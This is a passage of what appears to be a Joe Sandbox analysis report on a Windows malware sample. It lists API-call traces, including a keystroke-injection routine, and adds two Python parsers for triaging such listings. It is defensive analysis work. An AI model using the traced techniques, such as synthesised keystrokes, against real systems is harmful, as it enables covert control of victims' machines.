                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                              • String ID: [B
                                                                                              • API String ID: 1020059152-632041663
                                                                                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
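The function records above follow one fixed shape (an "APIs" header, bullet lines of the form Name.MODULE(args), ref: address, optional "Part of subcall function XXXXXXXX:" prefixes, then key/value metadata such as "API ID" and "Instruction Fuzzy Hash"). Reading them by eye does not scale past a few dozen functions, so the following added example, which is not part of the Joe Sandbox report or its tooling, parses records of this shape into Python dicts and then searches them for API combinations worth a second look, such as the LoadLibraryW/GetProcAddress/FreeLibrary sequence or the GetVolumeInformationW call listed in this section. The regular expressions are assumptions derived from the line shapes visible on this page; the embedded sample is constructed by copying three of the records above in abbreviated form.

```python
"""Parse Joe Sandbox per-function records into structured data and search them
for API-call patterns. Added example, not the report's own tooling; the regexes
are assumptions based on the line shapes visible in this report."""
import re
from collections import Counter

# Constructed sample: three records copied (abbreviated) in the shape of this
# report's listing, including one 'Part of subcall function' line.
SAMPLE = """\
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: Wu
• API String ID: 2449869053-4083010176
• Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D459
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
• __swprintf.LIBCMT ref: 0045D4E9
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\\VH
• Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Similarity
• API ID: AllocateHeap_free_malloc
"""

# One API-call bullet: optional subcall prefix, Name.MODULE, optional (args), ref: addr
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Any other bullet is 'Key: value' metadata (API ID, Source File, hashes, ...)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text):
    """Split the listing at each 'APIs' header; return one dict per function with
    'apis' (list of call dicts, in listing order) and 'fields' (metadata)."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                       # a new function record starts here
            current = {"apis": [], "fields": {}}
            records.append(current)
            continue
        if current is None or line in SECTION_HEADERS:
            continue
        m = API_RE.match(raw)
        if m:
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] else []
            current["apis"].append(call)
            continue
        m = FIELD_RE.match(raw)
        if m:
            current["fields"][m.group("key")] = m.group("val")
    return records


def api_names(record):
    """Direct API names in call order; subcall lines belong to the callee, not here."""
    return [c["name"] for c in record["apis"] if c["subcall"] is None]


def address_span(record):
    """Lowest and highest direct call site: the function's rough extent for a disassembler."""
    refs = [c["ref"] for c in record["apis"] if c["subcall"] is None]
    return (min(refs), max(refs)) if refs else None   # fixed-width uppercase hex sorts numerically


def find_pattern(records, required):
    """Indices of records whose direct API set covers every name in `required`."""
    need = set(required)
    return [i for i, r in enumerate(records) if need <= set(api_names(r))]


def api_frequency(records):
    """How often each direct API appears across all records."""
    return Counter(n for r in records for n in api_names(r))


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for label, pattern in [("dynamic import resolution", ["LoadLibraryW", "GetProcAddress"]),
                           ("volume information query", ["GetVolumeInformationW"])]:
        for i in find_pattern(recs, pattern):
            print(f"{label}: record {i} at {address_span(recs[i])} "
                  f"API ID={recs[i]['fields'].get('API ID')}")
```

Pattern lists such as the two in the usage block are the analyst's choice; the parser only guarantees that every call line of the shape shown in this report ends up as a name, module, argument list and call-site address, so the same records can be diffed against a clean build of the same binary or fed into a graph of who calls what.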
                                                                                              APIs
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                              • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                              • __getptd.LIBCMT ref: 00413DBD
                                                                                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                              • _free.LIBCMT ref: 00413E07
                                                                                              • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                              • String ID:
                                                                                              • API String ID: 155776804-0
                                                                                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                              APIs
                                                                                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                              • GetClientRect.USER32(?,?), ref: 00430364
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                              • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                              • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3220332590-0
                                                                                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1612042205-0
                                                                                              • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                              • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_strncmp
                                                                                              • String ID: >$U$\
                                                                                              • API String ID: 2666721431-237099441
                                                                                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                                              • String ID:
                                                                                              • API String ID: 2221674350-0
                                                                                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
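                                                                                              The function at 0044C570 above reads and rewrites the keyboard state table (GetKeyboardState / SetKeyboardState), posts 0x100 (WM_KEYDOWN), 0x104 (WM_SYSKEYDOWN) and 0x102 (WM_CHAR) to a target window, then calls SendInput. That is keystroke injection, not keystroke capture: a logger would install a keyboard hook or poll GetAsyncKeyState, and neither appears in this listing. The keylogging signature in the report's summary refers to the dropped .NET payload, not to this native function. Added example, not part of the Joe Sandbox report: a small Python parser for the report's own "APIs" line format that turns each entry into a record, resolves the uMsg argument of PostMessageW against winuser.h, and flags this injection pattern so a triager can find it across a long listing. The sample text is the listing above copied into a string; WM_NAMES holds the winuser.h values; the helper names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: the "APIs" block for 0044C570 from this report, copied
# verbatim, plus one "Part of subcall function" line from another block so
# the parser exercises both line shapes. Runs offline.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
Memory Dump Source
"""

# Window-message identifiers (values from winuser.h) for the uMsg argument.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x102: "WM_CHAR",
            0x104: "WM_SYSKEYDOWN", 0x105: "WM_SYSKEYUP"}
KEYSTROKE_MSGS = set(WM_NAMES.values())

# One Joe Sandbox API line: optional "Part of subcall function X:" prefix,
# Api.MODULE(arg,arg,...), ref: ADDRESS. CRT entries such as
# "_free.LIBCMT ref: ..." have no argument list and are skipped on purpose.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Union[int, str, None]]   # int for hex literals, None for '?'
    ref: int
    subcall_of: Optional[int] = None    # set for "Part of subcall function" lines

def parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None                      # '?' = argument the sandbox could not resolve
    try:
        return int(tok, 16)
    except ValueError:
        return tok                       # symbolic operand such as Function_00036C2B

def parse_api_listing(text: str) -> List[ApiCall]:
    """Collect the entries of the first 'APIs' block in a report fragment."""
    calls: List[ApiCall] = []
    in_apis = False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            in_apis = True
            continue
        if not in_apis:
            continue
        m = LINE_RE.match(line)
        if m:
            raw = m["args"]
            args = [parse_arg(a) for a in raw.split(",")] if raw.strip() else []
            calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
        elif s and not s.startswith("•"):
            break                        # next heading ("Memory Dump Source", "Strings") ends the block
    return calls

def posted_messages(calls: List[ApiCall]):
    """(ref, message name) for every Post/SendMessage whose uMsg is a literal."""
    out = []
    for c in calls:
        if c.api in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA") \
                and len(c.args) > 1 and isinstance(c.args[1], int):
            out.append((c.ref, WM_NAMES.get(c.args[1], "0x%X" % c.args[1])))
    return out

def synthesises_keystrokes(calls: List[ApiCall]) -> bool:
    """Keyboard messages posted to a window plus SendInput or a rewritten
    keyboard state table: the shape of a keystroke injector, not a logger."""
    names = {c.api for c in calls}
    msgs = {name for _, name in posted_messages(calls)}
    return bool(msgs & KEYSTROKE_MSGS) and bool(names & {"SendInput", "SetKeyboardState"})

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for ref, name in posted_messages(parsed):
        print("%08X posts %s" % (ref, name))
    print("keystroke injection:", synthesises_keystrokes(parsed))
```

Feed it the text of any "APIs" block from the report; entries without an argument list (the LIBCMT ones) are ignored, and an argument the sandbox printed as "?" stays None so that the message decoder never guesses.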
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$_wcscat
                                                                                              • String ID:
                                                                                              • API String ID: 2037614760-0
                                                                                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                              • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                              • String ID:
                                                                                              • API String ID: 960795272-0
                                                                                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                              APIs
                                                                                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4189319755-0
                                                                                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 1976402638-0
                                                                                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
